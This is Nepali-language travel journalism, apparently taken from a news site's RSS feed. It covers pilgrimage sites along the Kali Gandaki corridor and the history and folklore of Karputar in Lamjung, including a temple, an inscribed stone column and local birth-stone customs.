कालीगण्डकी किनारका घाटहरूमा पुस्तौंदेखि चल्दै आएका सांस्कृतिक मेला, पर्व, धार्मिक यात्रा, सामूहिक स्नानजस्ता गतिविधिले सामुदायिक संस्कार जोगाइ राखेको छ । घाटहरू मौखिक इतिहास, लोककथा र स्थानीय आस्थाका जीवित संग्रहालय जस्तै हुन । ऐतिहासिक र सभ्यतागत महत्व प्राचीन बस्तीहरु प्रायः कालीगण्डकी किनारमै विकसित भएका हुन । घाट वरपर पुराना मठ–मन्दिर, शिलालेख, चौतारा, धर्मशालाले इतिहासको साक्षी बनेका छन । पर्यटनका लागि कालीगण्डकी तटीय क्षेत्रमा रहेका तीर्थाटनका घाटहरू सबैका आफ्नो इतिहास र महत्व रहेको छ । तर पनि देवघाट, रिडी, सेतीवेनी, गलेश्वर र मुक्तिनाथको महत्व भने भिन्न रहेको छ । तीर्थाटनका पर्यटकहरू अन्य घाटमा भन्दा यी ठाउमा धेरै पुग्दछन । गुल्मी, पाल्पा र स्याङजा जिल्लाको संगम स्थल रिडी अर्थात रुरु क्षेत्र नेपालको चार धाम मध्येको एक र नेपालको बनारस भनेर चिनिन्छ । रिडीमा रिडी खोला र कालीगण्डकी मिसिएको छ । कालीगण्डकी र रिडी खोलाको दोभान नै रिडी अर्थात रुरु क्षेत्र हो । रुरु क्षेत्र पर्यटनको लागि धार्मिक, ऐतिहासिक, सांस्कृतिक र पुरातात्विक महत्वको धरोहर मानिन्छ । रिडीमा ऋषिकेशको मन्दिर र अन्य देवी देवताका मठमन्दिर र मूर्तिहरू पनि छन् तर सबै मन्दिर मध्ये ऋषिकेशको मूर्ति सबैभन्दा महत्वपूर्ण मानिन्छ । संसारमै एउटै कालो शालिग्रामले बनेको मूर्ति ऋषिकेश मन्दिरको मूर्तिमात्र हो । रिडीमा नेपालकै नमुनाको रुपमा तीनमुखे झुलुङे पुल बनेको छ । तीर्थाटन पर्यटकहरूलाई रुरुमा पुगेको बेला पुलबाट यात्रा गरी तीन जिल्लामा पुग्ने थप सुबिधा भएको छ ।
कालीगण्डकी करिडोर गैँडाकोटदेखि उपल्लो मुस्ताङको नेपाल–तिब्बत सिमा कोरला नाकासंग करिब चार सय ३५ कि.मि.पर्दछ । गैँडाकोटबाट पाल्पाको राम्दीसम्म १ सय ३२ किलोमिटर करिडोरको सडक निर्माण सम्पन्न भएको छ । पाल्पाको राम्दीदेखि रानीघाट सम्मको १७ कि.मी.सडकमा दैलातुङ्ख दर्पुक सडक क्षेत्रको मन्द्रान शिखरडाँडा र मझेटाको सडकमा स्तरोन्नतिको काम भैरहेको छ । करिडोर पूर्वी नवलपरासी खण्ड ८०, पाल्पा खण्ड ८५, गुल्मी खण्ड ४४, बाग्लुङ खण्ड ३६ म्याग्दीको बेनीदेखि जोमसोम सम्म ८२ र जोमसोमदेखि कोरला नाकासम्म १ सय ५ किलोमिटर पर्दछ । नेपाल–तिब्बत सिमाबाट तिब्बततर्फ प्रवेश गरेपछि फराकिलो उच्च पठार सुरु हुन्छ । कोरला नाका पार गरेपछि तिब्बततर्फ पर्ने नजिककोे बजार पुराङ हो  । कोरला नाकादेखि पुराङ बजारको दूरी करिब २५ किलोमिटर पर्दछ छ । कोरला नाकाबाट दुई सय ५७ कि.मि.पार गरेपछि तिब्बतको कैलाश मानसरोवर पुग्न सकिन्छ । रानीघाटदेखि रिडी, रुद्रवेनी हँुदै गुल्मीको पूर्तिघाट, ज्यामिरेघाट भएर बाग्लुङको जैमिनी र बलेवा हुदै करिडोर बाग्लुङ–पर्वत जोडने मालढुङ्गाको पुलमा जोडिन्छ । त्यसपछि करिडोरको सडक म्याग्दी हुदै गलेश्वर, तातोपानी, दाना, लेते हुदै जोमसोम र कागवेनी भएर उपल्लो मुस्ताङको लोमान्थाङ हुदै कोरोला नाका जोडिन्छ । आजभोली मुस्ताङको वारागुङ मुक्तिक्षेत्र र डोल्पाको छार्का ताङसोङ सडक पनि जोडिएको छ । मुस्ताङको वारागुङ पाक्लिङदेखि साङ्ता हुँदै डोल्पा जोडने सडक निर्माणले अब पर्यटकहरू लोमान्थाङ जादा डोल्पाको छार्का समेत पुग्न सक्दछन ।
करिडोर अर्थात देवघाटदेखि कोरला नाकासम्म घुम्ने ठाउँ धेरै छन । करिडोरको नदी किनारमा मात्र नभएर पर्यटनका लागि कालीगण्डकी दाया बाया रहेका जिल्लाहरूमा ऐतिहासिक, धार्मिक र पुरातात्विक महत्व भएका धेरै ठाउँहरू पर्दछन । करिडोर घुम्न र तीर्थाटन गर्नको लागि पर्यटकहरूले प्याकेज कार्यक्रम बनाउँदा राम्रो हुन्छ । करिडोरमा कुन ठाउँबाट प्रवेश गर्ने ? कुन– कुन घाटमा अथवा धार्मिक र पुरातात्विक महत्व भएको ठाउँमा पुग्ने ? अथवा देवघाट देखिनै कोरला नाकासम्म एकै पटक पुग्ने ? आफ्नो स्वास्थ्य, यात्राको समय र आवश्यक खर्चको जोहो गरेपछि घुम्न निस्कदा राम्रो हुन्छ । यात्रामा बलेरो अथवा स्कारपियो गाडी भयो भने करिडोरको यात्रा सजिलो मात्र होइन समयको समेत बचत हुन्छ । देवघाटदेखि कोरोला नाका सम्म एकै चोटी घुम्नको लागि समय नहुने पर्यटकहरूले करिडोरलाई आफ्नो अनुकुल अनुसार खण्ड–खण्डमा बिभाजन गरेर पनि घुम्न सकिन्छ । करिडोरलाई देवघाट, कालीगण्डकी उपत्यका, रिडी खण्ड, पर्वत, बाग्लुङ र म्याग्दीको खण्ड, त्यसपछि जोमसोम, मुक्तिनाथ र उपल्लो मुस्ताङ अर्थात कोरोला नाकासम्मको यात्राको तय गर्न सकिन्छ ।
करिडोरमा यात्रा गर्दा पर्यटकहरूले सयौं खोलानाला पार गर्नु पर्दछ । कतिपय कालीगण्डकीमा मिसिन आउने खोलामा तीर्थका लागि घाटहरू पर्दछन । मुस्ताङदेखि तलको यात्रामा जोमसोम, लेते पार गरेपछि अन्धगल्छी, रुपसे झरना हुँदै गलेश्वरमा राहुघाट खोला, बेनीमा म्याग्दी खोला, मालढुङगा नजिकै काठेखोला, कुश्मामा मोदी खोला, गुल्मी र बाग्लुङको सीमा बनेको पालुङखोला, जैमिनी घाटमा ठेउले खोला, गुल्मीको पूर्तिघाटमा पातीखोला स्याङजा, गुल्मी र पर्वतको सगममा रहेको सेतीवेणीमा मिसिने सेतीखोला हुदै मिर्मीमा आँधीखोला कालीगण्डकीमा मिसिन्छ । मीर्मीबाट कालीगण्डकी पश्चिमतर्फ मोडिन्छ । रिडिमा पुग्दासम्म रुद्रबेनीमा बडीगाड र रिडीमा रिडी खोला मिसिन्छ । रिडीमा पुगेको कालीगण्डकी त्यहाँबाट फेरी पूर्व मोडिन्छ र रानीघाट हुदै कालीगण्डकी राम्दीघाटबाट दक्षिण लागेपछि स्याङजा चापाकोटमा ज्याग्दी खोला, स्याङजा–तनहुँको सिमामा डुभ्रीबेसी खोला र नवलपुर–पाल्पाको सिमामा निस्ती खोला पनि कालीगण्डकीमा मिसिन्छ ।
करिडोरमा पाल्पा र स्याङजाको सीमामा पर्ने राम्दीघाट तीर्थाटन पर्यटकहरूका लागि महत्वपूर्ण मानिन्छ । राम्दीघाटमा अगाहखोला र गुरुवाखोला कालीगण्डकीमा मिसिएर त्रिवेणी बनेको छ । राम्दीघाटमा ऐतिहासिक, प्राचिन सिद्ध गुफा, शिवालय, राधाकृष्णको मन्दिरमा समेत पर्यटकहरूले तीर्थाटन र अवलोकन गर्न सक्दछन । राम्दीघाट नजिक महालिङ्ग धाममा कालीगण्डकी तीन किलो मिटर उत्तरतर्फ फर्केर बगेको छ । उत्तरवाहिनी धार्मिक दृष्टिकोणले निकै दुर्लभ र महत्वपूर्ण मानिन्छ । राम्दी भन्दा तल कालीगण्डकी उपत्यका पर्दछ । पाल्पा, नवलपुर, तनहुँ र स्याङ्जाको भूगोलमा बिचमा बग्ने कालीगण्डकीले उपत्यकालाई सुन्दर बनाएको छ । कालीगण्डकी उपत्यका लुम्विनी र गण्डकी प्रदेशको सिमा पनि पर्दछ । उपत्यकामा मनोरम प्राकृतिक सौन्दर्यले सजिएका पहाडी श्रृखलाका सुन्दर गाउँहरू पनि यात्राको क्रममा पर्यटकहरूले देख्न सक्दछन । उपत्यका भित्रको लेक, बेसीका तरेली परेका डाँडाकाँडाको मनमोहक दृष्य, स्याङ्जा, पाल्पा तनहुँ र नवलपुरमा कालीगण्डकीले बनाएको उपत्यका बिचमा नागवेली सुन्दरताको आकारमा बगेको कालीगण्डकी र सास्कृतिक घाटहरुले पर्यटकहरूलाई लोभ्याउछ । उपत्यका भित्र रहने बिभिन्न जातजाति विविध कला, सस्कृति, रीतिरिवाज, परम्परा, भेषभुषाले यात्रामा छुट्टै आनन्द पनि दिन्छ ।
उपत्यका वरपरका पहाडमा ऐतिहासिक कोट, गढी, किल्ला दरवार र ऋषिमुनीहरूका बिभिन्न घाटमा रहेको तपोभूमीले पर्यटकहरूलाई थप अध्यनको विषय बन्दछ । कालीगण्डकी उपत्यकाका दर्जनौं घाट तीर्थाटनको लागि पवित्र मानिन्छ । अर्सदीघाट, हुँगीघाट, माझीगाउँ, रत्नपुरको खोरियाघाट, रामपुरको गौरीघाट, तातोपानीघाट, ज्याग्दीघाट, रामघाट, केलादीधाम, पुट्टारघाट, हडाहाघाट, अत्रौलीघाट, खर्सराघाट, घुमरीघाट, कोटथर, लगाएतका तीर्थाटन घाटको छुट्टा– छुट्टै महत्व रहेको छ । यी सबै घाटहरूको तीर्थाटन र अध्ययन अवलोकन पर्यटकहरूले गर्न सक्दछन । कालीगण्डकीको घाट मध्ये स्याङजा, पाल्पा र तनहुँको सिमामा पर्ने केलादीघाटको महत्व भिन्न छ । हिन्दु सम्प्रदायहरुमा बैष्णव धर्म, कृष्ण प्रणामी, जैन, शिख आदि सवै पर्दछ । सम्प्रदायको विकास क्रममा धर्मगुरुहरूको आ–आफ्नै व्याख्या र परिभाषाका कारणले कतिपय हिन्दु धर्म भित्रका सम्प्रदायहरुमा संस्कारसमेत फरक छ । केलादीघाटमा वैष्णव धर्मको राधाकृष्ण मन्दिर, शिव मन्दिर र लक्ष्मीनारायण मन्दिर रहेका छन् । प्राचिन कालदेखि राधाकृष्ण मन्दिरमा अखण्ड भजन कृतन चलिरहन्छ । केलादीघाटलाई नेपाल निम्बर्क पीठको जन्मथलोको रुपमा लिने गरिन्छ ।
कालीगण्डकी किनारका सांस्कृतिक घाटहरू इतिहास, जीवन– मृत्यु दर्शन, सामाजिक सम्बन्ध र सांस्कृतिक निरन्तरताका जीवित प्रतीक हुन । घाटहरूमा घुमारीघाट फरक पहिचान र महत्व रहेको छ । हेर्दानै अचम्म लाग्ने घुमारीघाट नवलपुरको बुलीङटार र तनहुँको घिरिङ गाउँपालिकाको सिमानामा पर्दछ । कालीगण्डकीले निर्माण गरेको घुमारीघाट पर्यटनको लागि आकर्षक मानिन्छ । धार्मिक मान्यतामा अनुसार कालीगण्डकी देवघाटतर्फ बग्दै जादा कामधेनु गाईले बाच्छीलाई दुध खुवाउँदै गरेकोले नदी दाया परिक्रमा गर्दा घुमाउरो आकार लिन पुगेको मानिन्छ । घुमारीघाटलाई तनहुँको भूगोलमा पर्ने राम्जाकोटको उम्से डाँडाबाट हेर्दा कुम्भ भगवती लक्ष्मीको घडाको आकारमा देखिन्छ । घुमारीघाट कालीगण्डकीले बनाएका घाटहरू मध्यको अत्यन्त सुन्दर घाट मानिन्छ । घुमारीघाटलाई कालीगण्डकीले करिव पाचँसय रोपनी क्षेत्रफलको जमिनलाई शंख आकारमा घेरा दिएको छ । कुम्भ आकारको घुमारीघाटमा बुलिङटार गाउँपालिको भू– भागबाट प्रवेश गर्न सकिन्छ । यो कुम्भ आकारको घुमारीघाटमा प्रवेश गर्ने मार्गमा करिव ५ मिटर मात्र नदीले जमिन छाडेको छ । कुम्भको मुखमा मूर्ति रहित कामधेनु मन्दिर पनि छ । जहाँ मूर्तिको रुपमा चट्टानमा देखिने गाई र बाच्छीको खुरको डोवमा पूजा गरिन्छ ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
]]>
https://www.antaranganews.com/?feed=rss2&p=37639 0
   लमजुङमा पर्यटन : लुकेको इतिहास र सुत्केरीले गाडेको ढुङ्गा  https://www.antaranganews.com/?p=34673 https://www.antaranganews.com/?p=34673#respond Mon, 25 Aug 2025 13:37:04 +0000 https://www.antaranganews.com/?p=34673 पर्यटन प्रवर्धनको लागि नेपालमा प्राकृतिक सौन्दर्यता र सांस्कृतिक विविधताले सिगारेका धेरै ठाउँहरू छन । प्राकृतिक सौन्दर्यता र सांस्कृतिक विविधता मात्र होइन पर्यटकहरू अहिले अध्ययन, अनुसन्धान, मनोरञ्जन आदिका लागि विभिन्न ठाउँमा पुग्ने गर्दछन । पर्यटनमा खोज अनुसन्धान र इतिहासप्रतिको रुचि हुन्छ । खोज अनुसन्धानमा पर्यटकहरूले तथ्य–प्रमाण संकलन गर्ने र त्यसलाई विश्लेषण गरी निष्कर्ष निकाल्न सक्दछन । अर्कोतर्फ पहिल्यै रहेको ज्ञानलाई पुष्टि गर्ने, सुधार गर्ने वा नयाँ दृष्टिकोण दिने काम पनि गर्दछ । पर्यटन केवल यात्रा वा रमाइलो गर्ने माध्यम होइन । पर्यटनको यात्रामा देशको सांस्कृतिक सम्पदा, भौगोलिक विविधता र सामाजिक जीवनशैली बुझ्न पनि सकिन्छ । अनुसन्धानकै आधारमा पर्यटनस्थलको महत्व र प्रचार–प्रसार हुन्छ ।
इतिहास शास्त्रहरूको जग हो । इतिहासमा घटेका घटनाहरूको कालक्रमानुसार वर्णन गरेको हुन्छ । अर्को शब्दमा भन्दा प्राचीनतादेखि नवीनतातर्फ आउने मानवजातिसँग सम्बन्धित घटनाहरूको वर्णन नै इतिहास हो भन्दा पनि हुन्छ । इतिहासको धरातलमा नै उभिएर यी सबै विषयले मानव जातिलाई सभ्य र सुसंस्कृत हुन प्रेरित गरिरहेको हुन्छ । समाजमा रहेका वर्ग, जाति, धर्म, कला, संस्कृति, भूगोललगायत हरेक कुराको आफ्नो इतिहास हुन्छ । पर्यटनको क्षेत्रमा इतिहास कहिल्य पुरानो हुदैन । अझ खोज अनुसन्धानले इतिहासको पानामा नलेखिएका कुरा पत्ता लाग्दछ । अधिकाशं पर्यटकहरू अनुसन्धानमा इतिहास प्रतिको रुचि हुन्छ । पर्यटन अनुसन्धानमा इतिहासलाई विशेष प्राथमिकता दिन्छन । पर्यटकलाई यात्रामा कथा, किंवदन्ती, वीरगाथा वा प्राचीन संस्कृतिले आकर्षित गर्दछ । इतिहासको सन्दर्भ बिना पर्यटनस्थल केवल भौगोलिक स्थान मात्र हुन्छ, । तर इतिहास जोडिँदा त्यो स्थल जीवन्त र अर्थपूर्ण बन्दछ । इतिहासले स्थानीय संस्कृतिको उत्पत्ति, परम्परा र अभ्यासलाई उजागर गर्दछ । जसले पर्यटकलाई अझ नजिकबाट समाज बुझ्ने अवसर दिन्छ । खोज अनुसन्धान पर्यटनको मेरुदण्ड हो भने इतिहास त्यसको आत्मा हो । अनुसन्धानले पर्यटनलाई योजनाबद्ध, व्यवस्थित र दिगो बनाउन मद्दत गर्छ भने इतिहासले त्यसलाई मौलिक, आकर्षक र अर्थपूर्ण बनाउँछ । त्यसैले, पर्यटनको विकासमा खोज अनुसन्धान अनिवार्य र इतिहास अपरिहार्य हुन्छ ।
वास्तवमा शिलालेख इतिहासका स्रोतहरू हुन । शीलालेख बाहेक ताम्रपत्र, भोजपत्र, ताडपत्र आदि पनि इतिहास चियाउने आँखी झ्याल हुन । सत्यतथ्य घटनाहरूको इतिहास खोज्न यी सामग्री स्रोत हुन्छ । इतिहास निरन्तर खोज र अनुसन्धानको विषय हो । इतिहास सर्वव्यापक हुन्छ । सबै चीज वा वस्तुमा इतिहास लुकेको छ । तर सबै इतिहास दृश्यमान हुँदैन । इतिहासका कतिपय पाटा अदृश्य हुन्छन । यसलाई सजिलै पहिचान गर्न सकिन्न र इतिहासको खोज भै रहन्छ ।
मध्यपहाडी लोकमार्गमा लमजुङको मध्यनेपाल नगरपालिका– ७ मा कर्पुटार पर्दछ । कर्पुटारमा इशानेश्वर महादेवको मन्दिर, सात दिने सुत्केरीले गाडेको शिलालेख सहितको ढुङ्गा र भिमले ठेलो हानेको ढुङ्गा कर्पुटारको इतिहाससंग जोडिएको छ । इशानेश्वर महादेवको मन्दिर कास्की जिल्लाको सिक्लेस गाउँ भन्दा माथि हिमालको काखमा रहेको कपुचे तालबाट उदगम भएको मादी नदी र लमजुङको भुजुङ गाउँको भूगोलदेखि उदगम हुने मिदीम खोला बीच कर्पुटारको रामबजार पर्दछ । सुत्केरीले गाडेको शिलालेख सहितको ढुङ्गा र भिमले ठेलो हानेको ढुङ्गा मादी नदीको किनारमा रहेको छ । इशानेश्वर महादेवको उत्पत्ति सन्दर्भमा हिन्दू धर्मग्रन्थका विभिन्न पुराणमा उल्लेख गरिएको छ । ऐतिहासिक, धार्मिक, सांस्कृतिक तथा पुरातात्विक पृष्ठभूमि रहेको इशानेश्वर महादेवको मन्दिरमा शिवरात्रीको दिन सांस्कृतिक मेला लाग्ने गर्दछ ।
कर्पुटारको इशानेश्वर महादेवको मन्दिरले लामो इतिहास बाकेको छ । आज भन्दा ६ सय बर्ष अघि किसानले धानको बीउ राख्न जोत्न जाँदा फालीको टुप्पाले शिवलिङ्ग स्वरुपको शिलामा जोतिएर रगत बगेको र गोरुसहित किसान मरेको प्रशग पनि इशानेश्वर महादेवको उत्पत्ती बारेका लोक कथा छ । तत्कालीन गोरखाका निःसन्तान राजा कृष्ण शाहले शक संवत १४१४ मा आफ्ना पल्टन प्रयोग गरी त्यो समयमा मन्दिर निर्माण गरेका थिए । पछि उनलाई पुत्रलाभ भएको र छोराको नाम शिवरुप सम्झेर रुद्र शाह राखिएको थियो । इशानेश्वर महादेव मन्दिरको नजिकै, मादी नदीको किनारमा रहेको ढुङ्गाको स्तम्भ मौन साक्षीझैँ उभिएको छ । यो ढुङ्गा सात दिने सुत्केरी महिलाले गाडेकी थिइन । यो ढुङ्गा इतिहास र धर्मको गहिरो दस्तावेज पनि हो । विसं १८२९ अर्थात शाके १६९४ मा राजा वीरनारायणका धर्मपत्नीहरू शालधरा, सकलान र कुमारीले इशानेश्वर महादेवको नाममा शिवरात्रिको अवसर पारेर फकिर, साधु–सन्तहरूको सेवा र पूजाका लागि १४० मुरी खेत गुठीस्वरुप अन्न संकल्प गरेका थिए । दानको ऐतिहासिक अभिलेख ढुङ्गामा संस्कृत भाषामा कुँदिएको छ । ढुङ्गामा लेखिएको अभिलेख अनुसार श्री शाके सोह्रसय चौरानब्बेबाट सुरु हुने लेखमा दान, धर्म र भक्ति भावको कथा अंकित छ । जसलाई कालु मौखिके नामक व्यक्तिले कुँदेको जनाइएको छ । ढुङ्गाको स्तम्भ केवल धार्मिक आस्थाको केन्द्र मात्र नभएर मध्यकालीन समाजको गुठी व्यवस्था, दान परम्परा र राजकीय धर्म नीतिको पनि जिवन्त प्रमाण हो ।
कर्पुटारको इशानेश्वर जसलाई सन्तानेश्वर र पशुपति नाथ पछिको दोस्रो शक्ति प्राप्त महादेवको रुपमा पुजिने गरिएको छ । सो मन्दिरमा शिवरात्रीको दिन निर्जल व्रत, राती जागराम, चार प्रहरको पूजा, दुधले शिवलिंग, अभिषेक र शिव महिमा किर्तन र पूजा अर्चना गर्ने तीर्थाटनका पर्यटकहरू पुग्ने गर्दछन । कर्पुटारमा इशानेश्वर अर्थात सन्तानेश्वर महादेवको मन्दिरमा शिवरात्रिका दिन पूजा आजा गरेमा सन्तान प्राप्त हुने विश्वास तीर्थाटनका पर्यटकहरूले गर्दछन । बिषेश गरी विवाह भएको लामो समयसम्म पनि सन्तान नभएका जोडीहरु आफ्नो इच्छा पूरा हुने विश्वासले शिवरात्रीमा ठाडो बत्ती बाल्न इशानेश्वर महादेवको मन्दिरमा पुग्ने गर्दछन । ठाडो(उभिएर) बत्ती बाल्न नसक्नेहरूले बसेर पनि बत्ती बाल्दछन् । शिवरात्रिमा कर्पुटार पुग्ने पर्यटकहरूले मादी नदीमा स्नान गरी मन्दिरमा गाईको दूध एवम् बेलपत्र चढाउँछन । शिवरात्रीको दिन मेला हेर्न र तीर्थाटन गर्न जाने पर्यटकहरूले दिनभर निराहार व्रत बस्ने र रातभर उभिएर ठाडो बत्ती बाल्दा सन्तान प्राप्ति हुन्छ भन्ने जन विश्वास रहेको छ । सन्तान जन्मेर २, ३ वर्षको भएपछि सन्तान लिएर पुनः तीर्थाटनका लागि मन्दिरमा पुग्ने गर्दछन । पर्यटनको पुर्वाधार विकास गर्ने क्रममा अहिले मन्दिरको मध्यभागमा इशानेश्वरको प्राकृतिक शिवलिङ्ग तथा वरिपरि शिवपञ्चायनका मूर्ति राखिएका छन । इशानेश्वर महादेव मन्दिरमा पर्यटकहरूले १ सय ८ धारा र १०८ शिवलिङ्गको समेतको तीर्थाटन गर्न सक्दछन ।

शिवरात्री पर्वको अवसरमा कर्पुटारको इशानेश्वरमा हरेक वर्ष मेलाको आयोजना हुन्छ । कर्पुटारको मेलामा पर्यटकहरूलाई आकर्षण गर्ने भनेको लोकप्रिय सांस्कृतिक तथा लमजुङको पहिचानका रुपमा रहेको ठाडोभाकाको गीत पनि हो । ठाडोभाकाको गीत लमजुङमा निकै लोकप्रिय छ । लोकसाहित्य अन्तर्गतको महत्वपूर्ण विधाका रुपमा रहेको ठाडोभाकाको गीत लमजुङको कर्पुटारको पहिचान पनि हो । ठाडोभाकाको गीतको प्रचारको सुरुवातनै कर्पुटारको मेलाबाट भएको हो । लमजुङ बर्धन गाउँ(हाडीखोला)का देउबहादुर दुरा र उनका दौतरी पञ्चैसुब्बा गुरुङले मिलेर केटा– केटी बनेर वि.सं १९५० का दशकमा पहिलो पटक कर्पुटारमा ठाडोभाकाको गीत गाएको इतिहास छ । इशानेश्वर महादेव मन्दिरमा शिवरात्री मेलाका दिन रातभर बसेर देउबहादुर दुरा र पञ्चैसुब्बा गुरुङले ठाडोभाकामा पहिलो पटक गीत गाउनु भएकोले अहिले पनि ठाडोभाकाका गायकहरु गीतको बोलमा ‘कता गयो देउबहादुर दुरा, शून्य भयो कर्पुटार बजार ……. ’ भन्ने गर्दछन । ठाडोभाका गीत अहिले गण्डकी प्रदेशको सांस्कृति पूँजीका रुपमा रहेको छ । लमजुङ, गोरखा, तनहुँ, कास्की तथा स्याङजा जिल्लामा प्रचलित छ । ठाडोभाकाको यस्तो गीत अन्त्यानुप्रास मिलाएर गाउनुपर्छ । ठाडोभाका गीतका टुक्का प्रायः प्रकृतिसँग जोडिएर माया र पीरतिमा टुङ्गिने गर्दछ । ठाडो भाकामा गाउँका, दुःख, विरह, वेदना, कुण्ठा, प्रेम, समाज, वातावरण, समसामयिक घटना, इतिहास, सामाजिक परिवेशलगायत विषय समेटेर पनि गाउने गरिन्छ । करिव एकसय बर्ष भन्दा अगाडिदेखि लमजुङको खजेगाउँ, तुर्लुङकोट, भाँगु, मकैस्वाँरा, ठूलोस्वाँरा, कानेश्वाँरा, बासपानी, नेटा, कुन्छा, तान्द्राङ र वरपरका गाउँघरमा ठाडोभाकाको गीत गायक देउबहादुर दुराले नै सुरुवात गराएका थिए । त्यस्तै, लाहुर जाँदा आउँदा तथा नुनको ढाकर बोक्नका लागि तत्कालीन बटौली जाँदा त्यहाँका साथै स्याङ्जामा समेत यो भाका लोकप्रिय हुन पुगेको इतिहास छ । 

मादी नदी
मध्यनेपाल(लमजुङ्ग), २१ साउन:
मध्यनेपाल नगरपालिकाको वडा नं. ७, ५ र ४ काे दुईपिप्ले बजार हुँदै लमजुङको सिमाना एवम् कास्की रुपा गाउँपालिका स्यास्त्री र तनहुँको शिशाघाट बजारको सिमाना हुँदै

मादी र मिदिम खोलाको दोभान नजिक लगभग १० फिटको शिलालेख ढुङ्गाको स्तम्भ वि.सं.१८२९मा राजा वीरनारायणले लेख्न लगाएको शिला स्तम्भलाई सात दिने सुत्केरीले गाडेको ढुङ्गा भन्ने लोक कथन रहेको छ । कर्पुटारको सुत्केरीले ढुङ्गा केवल धार्मिक आस्थाको शिला स्तम्भ मात्र होइन मध्यकालीन समाजको गुठी व्यवस्था, दान परम्परा र राजकीय धर्म नीतिको पनि जिवन्त प्रमाण हो । तर, दुर्भाग्यवश, गुठीको जग्गा अहिले मोहीको नाममा दर्ता भैसकेको छ । केही दशक अघिसम्म मादी नदी किनारमा यही शीला स्तम्भ नजिक फागु पूर्णिमाको मेलामा छेलो हान्ने प्रतियोगिता हुने गर्दथ्यो । कास्की, तनहुँ र लमजुङका तीर्थयात्रीहरूको ठूलो भिड नै हुने गर्दथ्यो । हरिबोधिनी एकादशीमा फूल तार्ने परम्परासमेत थियो । यो परम्परा कारापुटार बासीका साथै वरपरका छिमेकीहरूबाट आजका दिनमा पनि त्यो संस्कृति धानिएकै छ । तर ती सबै परम्परा विस्तारै हराउँदै गएका छन । लमजुङमा शीलालेख नभए पनि सुत्केरीले गाडेको लोक कथा भएको ढुङ्गा खत्रीठाँटी, कुन्छा र गिलुङमा पनि छन ।
सुत्केरीले गाडेको र भिम ढुङ्गाको इतिहास :
नेपालको गाउँ–बस्तीमा हिंड्दा कतै खेतको डिलमा, कतै बाटोको किनारमा वा चौतारो छेउमा गाडिएका वा राखिएका साना ढुङ्गा देखिन्छन । कतिपय ढुङ्गामा रातो टीका, अक्षता वा धूपको कालो दाग हुन्छ । कतै धागो वा कपडाको टुक्रा बाँधिएको पाइन्छ । यी ढुङ्गालाई धेरै ठाउँमा सुत्केरी ढुङ्गा भनिन्छ । यसलाई सामान्य ढुङ्गा मात्र ठान्नेहरूले यसको गहिरो सामाजिक–सांस्कृतिक अर्थ बुझदैनन् । तर वास्तवमा यो मातृत्व, स्वास्थ्य, देवी–देवता र लोक विश्वासको मिश्रण हो । सुत्केरी ढुङगाको ऐतिहासिक पृष्ठभूमि खोज्ने हो भने नेपालका पहाडी क्षेत्रमा, विशेषगरी किरात, राई, लिम्बु, गुरुङ, मगर जस्ता समुदायमा बच्चा जन्माउने प्रक्रियालाई दैवी शक्तिसँग जोडेर हेर्ने परम्परा प्राचीन कालदेखि प्रचलित थियो । बच्चा जन्माउँदा हुने रक्तस्राव, पीडा र थकानलाई अशुद्धता मात्र नभई दुष्ट शक्तिको आक्रमणको सम्भावना पनि मानिन्थ्यो । त्यसैले सुत्केरी अवधिको अन्त्यमा अशुभ टार्ने, रोग र पीडा जमिनमा छोडने प्रतीकका रुपमा ढुङ्गा गाड्ने चलन विकसित भएको मानिन्छ । हिन्दू धर्मको विस्तारसँगै यस चलनमा धार्मिक पूजा र शुद्धीकरण संस्कार मिसियो ।
सुत्केरी ढुङ्गा केवल ढुङ्गा मात्र नभएर मातृत्व संस्कार, लोकविश्वास र धार्मिक आस्थाको जीवित प्रतीक हो । यसमा पूर्वजहरूको जीवनशैली, स्वास्थ्य, सुरक्षाबारेको दृष्टिकोण र देवी–देवताप्रतिको श्रद्धा मिसिएको छ । अहिले शहरीकरण, सडक निर्माण, घर बिस्तार र खेतीको परिमार्जनले धेरै पुराना सुत्केरी ढुङ्गा हराउँदै गएका छन । अस्पतालमा प्रसूति हुने र आधुनिक स्वास्थ्य ज्ञान फैलिनाले पनि यो परम्परा कमजोर बन्दै गएको छ । तर अझै पनि ग्रामीण भेगमा विशेष गरी पूर्वी पहाड र पश्चिम पहाडका केही गाउँमा, यो प्रथा जीवित छ । सुत्केरी ढुङ्गाको सांस्कृतिक अर्थ ढुङ्गा गाड्नु भनेको सुत्केरीको पीडा, अशुद्धता र सम्भावित दुष्ट आत्मालाई जमिनमा छोड्ने कार्य हो । यो कार्यले आमाको पुनः समाजमा पूर्ण सहभागिताको संकेत दिन्छ । ढुङ्गालाई देवीको प्रतीक मानेर पूजा गर्दा आमा र नवजातको स्वास्थ्य र दीर्घायु हुने विश्वास हुने गर्दछ । सुत्केरी ढुङ्गालाई क्षेत्रगत भिन्नता र स्थानीय नामहरू रहेको हुन्छ । पूर्वी पहाडमा राई–लिम्बु क्षेत्र अर्थात भोजपुर, पाँचथर, इलाम, धनकुटामा सुत्केरी थान वा नाङ्खामा भन्ने गरिन्छ । टोलको छेउ वा खोला किनारमा ढुङ्गा गाडेर धूप–अक्षता चढाइन्छ । गर्भवती महिलाले यस ढुङ्गा छुन अशुभ मानिन्छ । मगर र गुरुङ क्षेत्र गोरखा, लमजुङ, लगायतका जिल्लाहरूमा ढुङ्गामा रातो धागो वा कपडाको टुक्रा बाँधिन्छ । यसलाई माइको थान भनिन्छ । कतिपय ठाउँमा सुत्केरीको मृत्यु भएमा पनि ढुङ्गा गाडेर विशेष पूजा गर्ने परम्परा छ । मध्य पहाड र तराईको संमिश्रण क्षेत्रमा पूजा नगरी ढुङ्गा गाड्ने मात्र गरिन्छ । ढुङ्गा प्रायः खेतको डिल, बाटोको छेउ वा पाटी वरिपरि पाइन्छ । कञ्चनपुर, धनुषा, कपिलवस्तु थारु समुदायमा माटोको थुप्रो वा ढुङ्गा राख्ने र दूध–अक्षता चढाउने चलन छ । मैथिली समुदायमा यो छट्ठी संस्कारसँग जोडिन्छ ।
